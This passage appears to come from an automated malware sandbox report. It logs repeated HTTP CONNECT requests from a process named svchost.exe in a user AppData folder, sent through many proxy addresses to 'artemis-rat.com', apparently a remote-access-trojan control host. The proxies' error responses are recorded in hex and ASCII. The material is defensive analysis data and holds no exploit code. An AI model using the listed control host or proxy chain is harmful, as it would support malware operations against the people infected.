                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2695192.168.2.558851192.111.137.35414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.358346939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2696192.168.2.558752202.162.219.10108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.367072105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2697192.168.2.55587451.75.126.1503563243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.369689941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.485898018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2698192.168.2.555920179.49.237.5499943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.372328043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380486965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474406958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2699192.168.2.557950201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.375081062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2700192.168.2.558565123.56.1.50312943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.376192093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.703699112 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2701192.168.2.55593466.228.37.2524669543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.394706964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177423000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2702192.168.2.558827202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.395478010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2703192.168.2.558838198.105.101.129575843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.397418976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.686866045 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2704192.168.2.55587531.148.207.1538043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.401757956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.756566048 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2705192.168.2.55793043.255.113.2328443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.405337095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.676918983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.029798031 CET208INHTTP/1.0 404 Not Found
                                                                                    Server: HCS
                                                                                    Date: Sat, 09 Mar 2024 15:01:58 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 432
                                                                                    HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                    X-NGAA: MISS from CH-XW-NO1-315.4
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2706192.168.2.55822172.210.221.197414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.406407118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2707192.168.2.55885218.169.83.87108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.409641981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.746346951 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2708192.168.2.558831103.23.100.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.410772085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2709192.168.2.55583691.134.140.1605649543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.419378996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2710192.168.2.55885086.107.178.109312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.419811010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146028996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.146337986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942883015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646291971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2711192.168.2.55883462.171.131.101162943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.454416990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333336115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.442985058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646370888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2712192.168.2.558501117.160.250.163882843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.454416990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.169630051 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2713192.168.2.558867104.21.31.1898043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.454619884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.611849070 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2714192.168.2.5588368.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.455480099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2715192.168.2.558830212.108.155.205909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.455482960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2716192.168.2.55884534.92.12.210923843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.455708027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.767107964 CET28INHTTP/1.1 502 Bad Gateway


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2717192.168.2.556180147.124.212.313677943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.468008995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177550077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2718192.168.2.558025144.91.66.305828543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.481755972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548044920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677499056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2719192.168.2.55597847.90.126.78811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.494997978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.373872042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2720192.168.2.55797460.188.102.2251808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.495166063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
